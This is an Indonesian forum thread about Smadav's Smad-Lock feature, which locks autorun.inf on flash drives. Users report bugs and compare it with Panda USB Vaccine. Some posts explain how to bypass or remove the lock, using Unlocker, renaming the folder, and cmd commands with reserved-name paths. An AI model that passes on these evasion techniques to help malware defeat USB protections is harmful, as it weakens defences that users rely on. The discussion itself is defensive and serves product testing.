Forum Smadav

Smadav Center => Bug, Kritik, Saran => Topik dimulai oleh: Zai pada Mei 30, 2009, 05:44:44 PM

Judul: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Mei 30, 2009, 05:44:44 PM
Smad-Lock

Flashdisk adalah sumber utama penyebaran virus di Indonesia, sebagian besar kasus infeksi virus di Indonesia berasal dari pertukaran flashdisk dari satu komputer dengan komputer lainnya. Jadi, kalau kita mampu menjaga agar flashdisk tidak terinfeksi virus dari komputer lain maka tentunya komputer kita akan aman dan tidak akan sekali-kali terinfeksi virus. Suatu hal yang sangat fatal adalah kalau komputer kita terinfeksi virus impor (seperti conficker, sality, alman, dll). Berbeda kalau komputer terinfeksi virus lokal yang SEMUANYA mudah dibersihkan, virus impor akan sangat sulit dibersihkan, walaupun bisa dibersihkan tapi tetap saja akan meninggalkan bekas yang merusak.

Jadi, SOLUSI terbaik untuk masalah ini hanya satu, yaitu pencegahan. Hampir semua Virus Lokal & Impor sekarang memanfaatkan flashdisk sebagai sarana penyebarannya, tepatnya dengan membuat file autorun.inf yang diinfeksikan ke flashdisk. Sehingga kalau kita membuka flashdisk tersebut di komputer, virus akan berjalan secara otomatis tepat setelah kita membuka flashdisk. Smad-Lock berhasil membuat flashdisk Anda terkunci HANYA untuk file autorun.inf. Jadi, virus tidak akan mampu membuat file autorun.inf di flashdisk Anda, tentunya setelah flashdisk Anda sudah dikunci oleh Smad-Lock Smadav. Untuk mengaktifkan Smad-Lock Anda, harus mengaktifkan SmaRTP Proteksi Smadav terlebih dahulu. Smad-Lock akan aktif dan mengunci flashdisk Anda otomatis setelah Anda mencolok flashdisk. Jadi, kesimpulannya Smad-Lock telah memutuskan jalur penyebaran virus terbesar di Indonesia.

Tidak hanya sampai disini, setelah Smad-Lock mengunci flashdisk Anda. Smad-Lock juga membuat satu folder di flashdisk Anda, Folder itu bernama Smad-Lock (dengan karakter segitiga bagian kiri dan kanan). Folder Smad-Lock ini adalah folder teraman dari infeksi virus. Virus hampir tidak mungkin dapat memasuki dan menginfeksi folder ini dan semua file di dalamnya. Jadi, semua file yang Anda taruh dalam folder ini SANGAT AMAN dari infeksi virus. Tetapi, Anda tidak boleh me-rename nama folder ini sedikitpun. Folder ini sebaiknya hanya diisi dengan file yang dibuka dengan program buatan microsoft, seperti office (berjenis DOC, XLS, PPT, dan semua file office sejenisnya). Tapi sebenarnya Anda juga dapat mengisi file yang bukan berjenis dokumen office, seperti EXE, ZIP, RAR, tapi sebaiknya ketika Anda membuka file tersebut jangan langsung di dalam folder ini, Anda sebaiknya memindahkan file tersebut keluar folder ini terlebih dahulu sebelum membukanya.


4. Kinerja smad-lock. pertama2 saya agak sepele, krna folder smad-lock gampang di delete, tapi setelah liat folder autorun.inf baru percaya, virus ini ga bsa menambah kan autorun.inf krna uda ada autorun,inf tpi berupa folder*keknya teknik ini pernah saya baca di blog org* dan untuk mendelete file tsb harus memformat fd  :D

Smad-Lock memang sangat sulit di-delete, Semua program (termasuk virus) juga tidak bisa men-delete folder autorun.inf ini dengan cara biasa, ada cara khusus yang cukup rumit untuk men-delete-nya.

Ampun deh sama SmadLocknya..  8)
g berkutik dah FD gue.. No Confirmation, No Solution, No Explaination!!
Gimana cara ngapusnya mas zai? gimana non-anktifkannya?
aku msh butuh Autorun.inf nya buat narsis2an..  :D
trus, Foldernya byk amat? jd berkesan smadav yg ngejunk ke FD,.. hehehe piss...  :D
Pilih Narsis atau aman dari virus? :D
Hmm.. mungkin saya pikirkan fitur Smad-Unlock nya nanti ;)


Mas katanya baru pertama di dunia.. kalau smadlock yang sekarang saya udah lakukan dari dulu .. lewat CMD, trus bagaimana dengan ini mas..  http://experi3nc3.wordpress.com/2007/05/10/flash-disinfector-by-subs/

Nah berarti technology smadav udah pernah ada di Dunia.. sebelum Revisi 4 Di Release.

Pertanyaan saya :

1. Apakah ada perbedaan dengan artikle di atas antara ... Flash Disk Insfector sama SMADLOCK.


Tks

Saya tidak pernah tahu kalau ada teknologi yang mirip dengan Smad-Lock. Smad-Lock asli buatan saya sendiri dengan menggabungkan semua teknik penguncian autorun.inf yang sebenarnya bisa kita lakukan secara manual tapi tidak praktis. Jadi Smad-Lock adalah teknologi Smadav dan tidak ada yang menyamainya di dunia ini dalam metode penguncian autorun.inf, karena metode ini unik dan berbeda2 untuk setiap software.

Dan setelah saya survey, belum ada software lain yang mirip dengan Smad-Lock. Jadi, boleh dikatakan Smad-Lock adalah yang pertama di dunia.

Saya baru saja lihat metode dari Flash Disinfector, dan ini sangat berbeda dengan metode Smad-Lock.
http://www.myantispyware.com/2009/01/13/how-to-remove-flash-disinfector-protection-autoruninf-folder/

Karena pertanyaan mas ini mungkin saya akan membuat Smadav disebarkan ke luar negeri, karena ternyata Smadav juga pasti sangat berguna untuk mereka (bule), saya sedang mempersiapkan ini semua. ;)
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Mei 30, 2009, 06:46:35 PM
Mungkin ini bug lengkapnya(menurut saya) ;)  8)


<<Sekilas info>>

Teknologi Smad-lock uda terbukti keampuhannya, bukan melalui virus yng menyebar via fd, tpi saya mencobanya dgn cara memberikan Panda Vaccine(yaitu saingan smad-lock)
Ini Screen-shootnya :
(http://i378.photobucket.com/albums/oo221/agratheadmin/5-30-20095-54-26PM.jpg)

Panda Vaccine menyatakan bahwa ia tak bisa membuat file autorun.inf pd fd pada saat setelah saya pasang smad-locknya, padahal biasanya klo file autorun.inf pd fd (file virus maupun bukan) akan otomatis di delete oleh panda vaccine, hal  ini menyatakan bahwa, smad-lock emang sangat kuat walopun force mode kali pun (kalo ada :P)

Tapi saya menemukan Bug pd smad-lock
Krna Panda vaccine tak bisa membuat autorun.inf pd fd, makanya ia menyatakan tak bisa, seperti screen-shoot di atas, Tapi smad-lock tdk menyatakan kegagalannya nge-lock fd tsb malahan di bilang "SUCCES"
(gambarnya ini sambil pamerin virus buatan kuu :P  8) )
(http://i378.photobucket.com/albums/oo221/agratheadmin/5-30-20095-34-17PM.jpg)
dr gambar di atas saya ga menemukan file autorun.inf smad-lock, ada nya autorun.inf buatan panda :P alias smadav gaga nge-lock fdnya, krna ada autorun.inf dari panda vaccine, yng telah membuat semua aurotun.inf tak bisa di buat.

klo ada panda vaccine di fd smad-lock gagal
klo ada Smad-lock di fd Panda vaccine gagal

Jadi keduanya sama2 kuat ntuk halangin virus yng menyebar via usb,

Tapi klo di suruh milih, saya bakalan milih Smad-lock, krna selain buatan lokal, dan ada fitur ini

Smad-Lock


Tidak hanya sampai disini, setelah Smad-Lock mengunci flashdisk Anda. Smad-Lock juga membuat satu folder di flashdisk Anda, Folder itu bernama Smad-Lock (dengan karakter segitiga bagian kiri dan kanan). Folder Smad-Lock ini adalah folder teraman dari infeksi virus. Virus hampir tidak mungkin dapat memasuki dan menginfeksi folder ini dan semua file di dalamnya. Jadi, semua file yang Anda taruh dalam folder ini SANGAT AMAN dari infeksi virus. Tetapi, Anda tidak boleh me-rename nama folder ini sedikitpun. Folder ini sebaiknya hanya diisi dengan file yang dibuka dengan program buatan microsoft, seperti office (berjenis DOC, XLS, PPT, dan semua file office sejenisnya). Tapi sebenarnya Anda juga dapat mengisi file yang bukan berjenis dokumen office, seperti EXE, ZIP, RAR, tapi sebaiknya ketika Anda membuka file tersebut jangan langsung di dalam folder ini, Anda sebaiknya memindahkan file tersebut keluar folder ini terlebih dahulu sebelum membukanya.




GA ADA DUANYA DEEH, SEEEEEPPP

tariiiiik maaaasss!!!!

Judul: Re: Smad-Lock
Ditulis oleh: Martebs pada Mei 30, 2009, 08:25:08 PM
Klo Smad-lock, agar bekerja ditaruh di flashdisk pa di komputer
pa di celana pa di lemari pa di kasur pa di tangan pa di kuburan?
lupa,lupa-lupa-lupa-lupa-lagi naronya.....
inget,inget-inget-inget-cuma inget makenya...........
di klik terus di scan...
wah... hebat.....yeahhhhhhhhh
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Mei 30, 2009, 08:43:11 PM
Klo Smad-lock, agar bekerja ditaruh di flashdisk pa di komputer
pa di celana pa di lemari pa di kasur pa di tangan pa di kuburan?
lupa,lupa-lupa-lupa-lupa-lagi naronya.....
inget,inget-inget-inget-cuma inget makenya...........
di klik terus di scan...
wah... hebat.....yeahhhhhhhhh
I don't know what's his/her saying?  ???  :-

Ada Bug tambahan Lagi nih

Smad-lock nge-lock fd, saat rtpnya mati alias disable

nih potonya :
(http://i378.photobucket.com/albums/oo221/agratheadmin/5-30-20098-34-59PM.jpg)

Saranku :
1.  Menurutku seharusnya  klo rtpnya mati, otomatis pemasangan smad-lock pd fd juga di nonaktifkan
2.  Bikin option smad-lock aja, mau otomatis di lock fdnya ato di promt dulu, ato bahkan enggak di lock
3.  Penjelasan Remove Smad-lock ;)



Post Merge: Mei 31, 2009, 10:23:55 AM
Smad-lock sudah bisa di hilangkan! sudah di buktikan oleh mas kambeeng! http://www.suryaabadicom.co.cc/?p=40

ini filenya :D
http://www.ziddu.com/download/4972236/unlocker1.8.7.zip.html

saya uda coba kok, efektif jga :D



mas ref, ini cara ilanginnya :D ;)
(sorry mas kambeeng klo blom minta izin  :( )
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Mei 31, 2009, 12:57:30 PM
sudah lw coba tuk autorun.inf smadav juga??
gw pnah posting ini, http://www.smadav.net/forum/bug-kritik-saran/smadav-rev-4/msg2964/?topicseen#msg2964 (http://www.smadav.net/forum/bug-kritik-saran/smadav-rev-4/msg2964/?topicseen#msg2964)
(he2.. duluan sebelum kambeeng)
software2 spt unlocker byk kq..

Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Mei 31, 2009, 01:58:38 PM
emang, tapi waktu itu saya lagi kurang perhatian :P sorry yaiww mas boot!  :D

<<sekilas info lagi>>

Ternyata Panda Vaccine obatnya lebih permanen di bandingkan dgn smad-lock

terbukti setelah saya delete pke unlocker ga bsa, dan muncul sperti ini

(http://i378.photobucket.com/albums/oo221/agratheadmin/5-31-200910-38-23AM.jpg)
Ini mengindikasikan bahwa sulit untuk nge-remove vaccine ini, sedangkan smad-lock yng bsa d remove dgn mudah

(http://i378.photobucket.com/albums/oo221/agratheadmin/5-31-200910-36-40AM.jpg)
Bukannya saya menjelekan smad-lock, tetapi saya mau ngasih saran :

-Menggunakan Teknologi unlocker untuk remove smad-lock via smadav itu sendiri
-Menjadikan Teknologi unlocker pd smadav agar menjadi "Force deleter" untuk virus yng membandel & file2 yng susah di hapus


sekian  :D  peace out yooo!!  8)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Mei 31, 2009, 02:11:08 PM
Mantabz juga Panda Security..
Download aah.. he2.
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Mei 31, 2009, 04:02:49 PM
tengkyu tengkyu...
tp setelah dipikir2.. biarin aja deh FDku dilock,, toh klo buat narsisan jg g efektif, bakalan kehapus sm virus di komputer temen2..
sekarang folder ? Smad-Lock ? kupake buat nyimpen data kuliah dan skripsiku..  8)

mas zai berhasil meracuni pikiranku..  ;D
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Mei 31, 2009, 04:03:46 PM
tengkyu tengkyu...
tp setelah dipikir2.. biarin aja deh FDku dilock,, toh klo buat narsisan jg g efektif, bakalan kehapus sm virus di komputer temen2..
sekarang folder ? Smad-Lock ? kupake buat nyimpen data kuliah dan skripsiku..  8)

mas zai berhasil meracuni pikiranku..  ;D


wew.. gak baca postingan ajojing? bisa di Unlock tuh.
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 01, 2009, 08:43:33 AM

-Menggunakan Teknologi unlocker untuk remove smad-lock via smadav itu sendiri


Sebenarnya kalau suatu software itu dibuat dengan kode yang lengkap seperti Unlocker pasti bisa menghapus Autorun.inf buatan Smad-Lock. Beda dengan Panda USB Vaccine yang tidak bisa di-delete kecuali Flashdisk-nya di-format. Panda USB Vaccine ini merubah struktur FAT/FAT32 pada Flashdisk, jadi tidak mungkin bisa di-delete. Kekurangannya, Panda USB Vaccine hanya bisa dipakai di FAT/FAT32, jadi gak bisa dipake di NTFS, contoh : harddisk external. Tapi, Smad-Lock bisa digunakan dimana saja di semua tipe drive (Flashdisk, Mem.Card, CD, DVD, Harddisk, dll.), dan di semua tipe FAT/FAT32/NTFS.   ;)



Ada Bug tambahan Lagi nih

Smad-lock nge-lock fd, saat rtpnya mati alias disable

Saranku :
1.  Menurutku seharusnya  klo rtpnya mati, otomatis pemasangan smad-lock pd fd juga di nonaktifkan
2.  Bikin option smad-lock aja, mau otomatis di lock fdnya ato di promt dulu, ato bahkan enggak di lock
3.  Penjelasan Remove Smad-lock ;)

Smad-Lock hukumnya WAJIB, dan tidak ada penjelasan tata cara me-remove-nya, karena kalau Smad-Lock dinon-aktifkan hanya akan memudahkan datangnya virus ke Flashdisk :D Lagipula Autorun.inf gunanya juga sangat sedikit di Flashdisk.  :D
Judul: Re: Smad-Lock
Ditulis oleh: ½life™ pada Juni 01, 2009, 09:22:29 AM
panda usb vaccine bs jg di pake bwt vaccinated harddisk kompi

perasaan skrg dh lmyn jrg ada virus pke autorun.inf,kecuali virus lokal seh
bbrp virus exe injector mlh ga bikin autorun.inf

telat nih, gw dh pke panda
nti gw cb bwt usb yg laen hehehe
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 01, 2009, 09:31:51 AM
Yoiii wajibkan aja.. klo perlu seharusnya dari awal gak perlu di bilang ada fasilitas ini.
Orang awam juga tidak mengerti, artinya kan SmadAV sudah mengurangi penyebaran Virus
melalui Flash Disk..


<!---Owh iyaa tambahin 1 tombol donkz di menu forum, mungkin di bawah Font Face--->
<!---Tombol SmadAV, jd klo kita klik SmadAV di post muncul kata SmadAV berwarna hijau--->
<!---Untuk mempermudah aja, mengerti gak maksudnyaaa?---> <!---OOT--->
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Juni 01, 2009, 11:50:55 AM
@boot +> baca yg bener.
Klo mw unlockernya,, silahkan baca di web mas dwi.. keren, buat ngancurin virus juga mantab (ada delete on bootingnya) 8)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 01, 2009, 01:16:52 PM
@boot +> baca yg bener.
Klo mw unlockernya,, silahkan baca di web mas dwi.. keren, buat ngancurin virus juga mantab (ada delete on bootingnya) 8)


udah dibaca dgn benar pak, harboot menaggapi ini :
Kutip
Smad-Lock hukumnya WAJIB, dan tidak ada penjelasan tata cara me-remove-nya, karena kalau Smad-Lock dinon-aktifkan hanya akan memudahkan datangnya virus ke Flashdisk Cheesy Lagipula Autorun.inf gunanya juga sangat sedikit di Flashdisk.  Cheesy


Klo post unlocker-nya kambeeng, harboot udah nulis di forum ini 2 hari sebelum kambeeng..
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 01, 2009, 04:02:17 PM
Fungsi Autorun.inf di Removable Disk sangat sedikit, dan hanya digunakan buat narsis2an :D
http://dailycupoftech.com/usb-drive-autoruninf-tweaking/
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Juni 01, 2009, 10:13:30 PM
Tapi menurut saya klo rtpnya non-akitf seharusnya semua fitur nya mati termasuk Smad-lock ???

kan ada juga yng ingin narsis2 trus ga seru aja ga ada virus yng nyerang kompi :P  :D
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 02, 2009, 04:03:35 AM
Tapi menurut saya klo rtpnya non-akitf seharusnya semua fitur nya mati termasuk Smad-lock ???

kan ada juga yng ingin narsis2 trus ga seru aja ga ada virus yng nyerang kompi :P  :D

SmadAV tidak mematikan fitur Smad-lock dan rasanya tidak perlu.. hahahaaa :D
Judul: Re: Smad-Lock
Ditulis oleh: Bobby315 pada Juni 02, 2009, 09:45:23 AM
mangnya smad-lock buat apaan, saya udah baca keterangannya tapi malah nggak ngerti  :P
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 02, 2009, 10:53:38 AM
mangnya smad-lock buat apaan, saya udah baca keterangannya tapi malah nggak ngerti  :P


Smad-Lock membuat sebuah file autorun.inf yg tdk bisa dihapus di Fdisk,
sehingga virus gak bisa emembuat autorunnya..
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Juni 02, 2009, 11:11:09 AM
berarti virus lokal bakal kembali keawal kayaknya. jenis2 mengkopikan diri sebagai folder palsu, soalnya autorun,inf udah susah diharapkan..  :D
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 02, 2009, 12:02:21 PM
berarti virus lokal bakal kembali keawal kayaknya. jenis2 mengkopikan diri sebagai folder palsu, soalnya autorun,inf udah susah diharapkan..  :D


kan autorunnya masih bisa dihapuuus.. he2.
lagian klo membicarakan virus (klo indonesia blom ada yg bisa buat virus adanya worm),
virus infect program2 di Fdisk, lalu kita gak tau dan nge klik.. jalan deh.
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 04, 2009, 09:20:09 AM
berarti virus lokal bakal kembali keawal kayaknya. jenis2 mengkopikan diri sebagai folder palsu, soalnya autorun,inf udah susah diharapkan..  :D
bukannya untuk menjalankan cara ini juga diperlukan autorun.inf sebagai driver nya mas ref?
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 04, 2009, 09:43:41 AM
berarti virus lokal bakal kembali keawal kayaknya. jenis2 mengkopikan diri sebagai folder palsu, soalnya autorun,inf udah susah diharapkan..  :D
bukannya untuk menjalankan cara ini juga diperlukan autorun.inf sebagai driver nya mas ref?


maksudnya gak perlu autorun.. jd pake tekhnik manipulasi..
Virus dibuat seolah2 seperti Folder / Image, misal Mesra.jpg (sebenarnya virus.exe)
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 04, 2009, 09:50:43 AM
tapi boot...bukannya ntar klo tuh file virus diklik bakal ngebuat autorun.inf juga?
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 04, 2009, 09:52:54 AM
tapi boot...bukannya ntar klo tuh file virus diklik bakal ngebuat autorun.inf juga?


gimana cara buatnya? yg di SmadLock kan gak bisa di replace / dihapus??
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 04, 2009, 10:24:48 AM
tapi boot...bukannya ntar klo tuh file virus diklik bakal ngebuat autorun.inf juga?


gimana cara buatnya? yg di SmadLock kan gak bisa di replace / dihapus??
bukan smadlock yang dwarf bicarain...tapi psotingan lw yang meng-qoute postingan gw pada jam089:20:09 wib...coba baca lagi...paham gak?
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 04, 2009, 01:14:04 PM
Kutip
bukan smadlock yang dwarf bicarain...tapi psotingan lw yang meng-qoute postingan gw pada jam089:20:09 wib...coba baca lagi...paham gak?

kagak paham.. klo gak penting mari kita lupakan.. (capeeek mikir, he2)
Judul: Re: Smad-Lock
Ditulis oleh: RefrizaL pada Juni 04, 2009, 02:27:39 PM
si dwarf g faham tuh..
maksudnya klo virus autorun.inf terancam punah gara2 smadlock, mungkin virus yang baru ntar kembali ketipe lama, yaitu melalui manipulasi seperti kata harboot..  :-X
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Juni 04, 2009, 04:46:38 PM
teknologi penyebaran virus kembali ke zaman batu, ;)

brarti memakai teknik penyebaran brontok tuh?  ???
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 04, 2009, 05:01:27 PM
teknologi penyebaran virus kembali ke zaman batu, ;)

brarti memakai teknik penyebaran brontok tuh?  ???

Wah dapat ide lagi nih aku :D
Social-Engineering Virus Lokal Perintis juga ga mempan lagi buat Smadav 2009 Rev. 5 nanti, akan ada heuristik tambahan dengan melihat struktur file dan folder (di Flashdisk khususnya). Contoh salah satunya :
Jika ada folder bernama "New Folder" (Syarat harus hidden untuk Fixed Disk) maka file bernama "New Folder.exe" adalah virus.

Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 04, 2009, 05:16:26 PM
wew.. jarang virus spt ini lg.. lagian klo berdasarkan nama juga susah.
ntar asli dikira palsu.
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 05, 2009, 09:24:16 AM
wew.. jarang virus spt ini lg.. lagian klo berdasarkan nama juga susah.
ntar asli dikira palsu.
siapa tau ntar bakal merebak lagi gara-gara autorun.inf nya dikunci ma smadav...
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 06, 2009, 05:18:59 PM
Ada 2 laporan yang isinya sama :

Kutip dari: Surgeon Ofthedead
keren bwat smadAV, tp smad-lock nya knapa menyembunyikan folder di flash disk? ge mana cara munculkannya kembali?

GE MANA MUNCULKAN FOLDER YG DI HIDDEN OLEH SMAD-LOCK? SOALNYA WAKTU SMAD-LOCK AD DI FLASHDISK, SMUA FOLDER MENGHILANG!

Kira-kira ini bug atau user awam yang salah paham dan kurang mengerti tentang Smad-Lock?
Judul: Re: Smad-Lock
Ditulis oleh: Bobby315 pada Juni 06, 2009, 08:55:45 PM
@ zai

usernya gak ngerti gimana cara makenya biarpun ada tutorialnya, kan yg ngerti pake AV tuh dikit kebanyakan tuh scan - delete
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 06, 2009, 10:15:57 PM
@ zai

usernya gak ngerti gimana cara makenya biarpun ada tutorialnya, kan yg ngerti pake AV tuh dikit kebanyakan tuh scan - delete


lalu penyebab file-nya hilang apaaa?? virus? sama2 kena virus begitu?

---------------------------------------------------------------------------------

Lihat gambar bwh.. ada yg nemuin cara jebol SmadLock dgn mudah..
lgs harboot cobain dan ternyata benar, ini screenshotnya.
cuman RENAME
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada Juni 07, 2009, 11:12:01 AM
@ zai

usernya gak ngerti gimana cara makenya biarpun ada tutorialnya, kan yg ngerti pake AV tuh dikit kebanyakan tuh scan - delete


lalu penyebab file-nya hilang apaaa?? virus? sama2 kena virus begitu?

--------------------------------------------------------------------------------
Lihat gambar bwh.. ada yg nemuin cara jebol SmadLock dgn mudah..
lgs harboot cobain dan ternyata benar, ini screenshotnya.
cuman RENAME
:-\ kok itu blom trpikir yah sma saya  :-\

bagus lah klo uda tau bugnya  :-X
Judul: Re: Smad-Lock
Ditulis oleh: Bobby315 pada Juni 07, 2009, 11:44:27 AM
untuk saat ini virus yg beredar di indo blm ada fitur renamenya jadi si programmer masih tenang2 aja tapi jgn lama2 krn bisa jadi kedepannya akan ada.
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 07, 2009, 01:49:24 PM
untuk saat ini virus yg beredar di indo blm ada fitur renamenya jadi si programmer masih tenang2 aja tapi jgn lama2 krn bisa jadi kedepannya akan ada.


yaaa kedepannya gw yg buat, hahaaa..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 07, 2009, 10:48:25 PM
fitur smad-lock nya keren jg.,tp syang msh ad bberapa bug ni... :( :(
 n folder autorun.inf msh bs direname..

sbenarnya folder smad-lock itu udh bs dbwt pke cmd..,(cm g praktis) :)
nih bgi2 tipsnya..

md \\?\X:\nm folder\\     x=drive, nm folder=bebas(nm ky nul,aux,con,lptx,comx x=1-9 jg bs) ===> ni bwt bqn foldernya

klo mw apus g msti pke Unlocker sgla, pke cmd jg bs ko.,cranya
rd \\?\X:\nm folder yg mw diapus /s /q

n sran aj u/ folder smad-lock yg ad segitganya(unicode) msh bs direname, isinya jg msh bs di superhidden(di set attribute)..
gmna klo dinamin pke ilegal karater,jd g bs direnme n g bs di set atribute hiden ma virus  :D :D
contoh
md \\?\X:\?_folder_?".\\


mas admin request fitur smadav donk..
supaya ada permision control bwt nmbahin string registry run wndows (cz wkt itu kna vrus di kom,vrusnya berhasil bqn string registry,pdhal smad rtp nya nyala tp didiemin aj..) ky kasepersky qtu lah...

Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 07, 2009, 11:26:09 PM
mantabz izuuul...
tp mungkin request izul gak di respon dlm waktu dekat..
semua lg pd siibuk.. keep posting, ok!
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Juni 08, 2009, 05:19:03 PM
mantabz izuuul...
tp mungkin request izul gak di respon dlm waktu dekat..
semua lg pd siibuk.. keep posting, ok!

Y sma2 boot., :)
sbnrnya klo folder autorun.inf itu mw 100% aman,qta bs pke perintah cacls di cmd (i like cmd.. :) )
qta rubah ACLs folder autorun.inf di fd qta (di set deny access.,codenya plajarin sendiri y...) jd g bkal bs di rename atw diapus skalipun(klo ACLs nya blm diubah lgi..) tp syangnya cm bs dpke klo file systemnya NTFS... :( :(
ada yg tw ga supaya di FAT / FAT32 bs dgunain jg perintah cacls???? bagi2 caranya y....

n tips lg ni klo tmn2 bosen dgn karakter unicode segitiga, bs gnti dgn yg laennya (cz karakter unicode tu byk, ga cm satu)
klik run n ketikan charmap n enter, nah disitu bs plih dh mn yang disuka... :D :D
dgn ckup 1 karakter unicode di awal nm folder, mka foldernya dh aman (cz virus byasanya g support unicode n di bypass jdnya)
tp klemahannya msh bs di renme tu folder+di hidden ma virus. klo mw biar bs ga direname+ di hidden ad cranya (bc post gw sblumnya y..)
n klo dah berhsl cb cpykan 1 file ke dlm foldernya, psti ad yang aneh stelah itu..cb di cari y ap yg beda..
ksh tw y klo dah nemu.. ;)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada Juni 08, 2009, 05:25:30 PM
Karakter Unicode ??? ada di dinding harboot.com jugaaa..
biasa harboot pakai buat chat di facebook.. ???... he2.

Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 08, 2009, 06:02:55 PM
klo mw apus g msti pke Unlocker sgla, pke cmd jg bs ko.,cranya
rd \\?\X:\nm folder yg mw diapus /s /q
Lihat gambar bwh.. ada yg nemuin cara jebol SmadLock dgn mudah..
lgs harboot cobain dan ternyata benar, ini screenshotnya.
cuman RENAME
Tetap akan sulit bagi virus untuk me-rename folder ini, karena folder ini bersifat system dan read-only, dan sampai sekarang belum terlihat ada virus yang mencoba melakukan ini.

Walaupun virus berhasil membobol pertahanan Smad-Lock, Selama Smad-RTP aktif di komputer kita, autorun.inf akan selalu dibasmi sesaat setelah flashdisk dicolok :)

Karakter Unicode ??? ada di dinding harboot.com jugaaa..
biasa harboot pakai buat chat di facebook.. ???... he2.
Klo mau Unicode yang lain cari aja di Microsoft Word, banyak banget :D

n sran aj u/ folder smad-lock yg ad segitganya(unicode) msh bs direname, isinya jg msh bs di superhidden(di set attribute)..
Sangat sulit mengakses apalagi me-rename-nya lewat kode karena kode virusnya harus support Unicode, tapi hampir semua virus sekarang tidak support Unicode.

mas admin request fitur smadav donk..
supaya ada permision control bwt nmbahin string registry run wndows (cz wkt itu kna vrus di kom,vrusnya berhasil bqn string registry,pdhal smad rtp nya nyala tp didiemin aj..) ky kasepersky qtu lah...
Setiap saat banyak program yang menulis ke registry, jangan terlalu banyak membandingkan Smadav dengan Kaspersky karena Kaspersky punya untung US$67.3 juta dollar = 673 Milyar di tahun 2006, :D Kelebihan Smadav dibanding Kasperksy ada di pembersihan virus lokal. Dan Smadav juga sudah bisa membersihkan lebih dari 1500 Value Registry.

Smad-RTP hanya mencegah eksekusi virus dari explorer dan flashdisk. Jadi tidak akan ada infeksi registry jika eksekusi virus berhasil dicegah.
Judul: Re: Smad-Lock
Ditulis oleh: azy pada Juni 09, 2009, 06:02:33 PM
mudah2an rev 4.4 bs mendeteksi conficker dan bisa lock folder recycler, amiin :-X
Judul: Re: Smad-Lock
Ditulis oleh: ebdancer pada Juni 10, 2009, 12:24:05 AM
Terima kasih team SMADAV  :). Smad-Locknya sementara ini benar-benar ampuh, gak takut lagi colok copy-copy file dari kompie temen  8), Pencegahan lebih baik dari pada mengobati  :P. Semoga dalam 3-5 thn kedepan menjadi berkembang menjadi perusahaan anti virus spesial no 1 di INDONESIA.  ;)
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada Juni 10, 2009, 09:59:28 AM
@ebdancer:
smadav akan bertahan ribuan tahun jika mendapat bantuan dari kalian semua...baik bantuan berupa laopran bug,kritik, dan saran hingga bantuan berupa dana segar... :) :) :)
Judul: Re: Smad-Lock
Ditulis oleh: azy pada Juni 13, 2009, 10:25:56 AM
Mr Zai, Smadav revisi berikutnya bisa lock folder Recycler di falshdisk gak?
kalo bisa sekalian detect conficker dong ya  :-X
Judul: Re: Smad-Lock
Ditulis oleh: ebdancer pada Juni 14, 2009, 12:15:47 PM
@Mini Dwarf : Yups, kalo dah resmi jual dan gak banyak bug, pasti gue beli  buat komputer rumahan gue:-bd, smntra liat liat dlu ;)
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Juni 16, 2009, 11:51:12 AM
Mr Zai, Smadav revisi berikutnya bisa lock folder Recycler di falshdisk gak?
kalo bisa sekalian detect conficker dong ya  :-X

Smadav revisi berikutnya mungkin akan mendelete folder Recycler di flashdisk daripada me-lock-nya, karena Smad-Lock sudah ada jadi tidak perlu lagi me-lock folder lain ;)
Judul: Re: Smad-Lock
Ditulis oleh: smad_vortex pada Juni 16, 2009, 11:54:31 AM
Mr Zai, Smadav revisi berikutnya bisa lock folder Recycler di falshdisk gak?
kalo bisa sekalian detect conficker dong ya  :-X

Smadav revisi berikutnya mungkin akan mendelete folder Recycler di flashdisk daripada me-lock-nya, karena Smad-Lock sudah ada jadi tidak perlu lagi me-lock folder lain ;)



gimana cara mendelete folder recycler d komput ? :-\
Judul: Re: Smad-Lock
Ditulis oleh: smad_vortex pada Juni 16, 2009, 11:56:53 AM
@ebdancer:
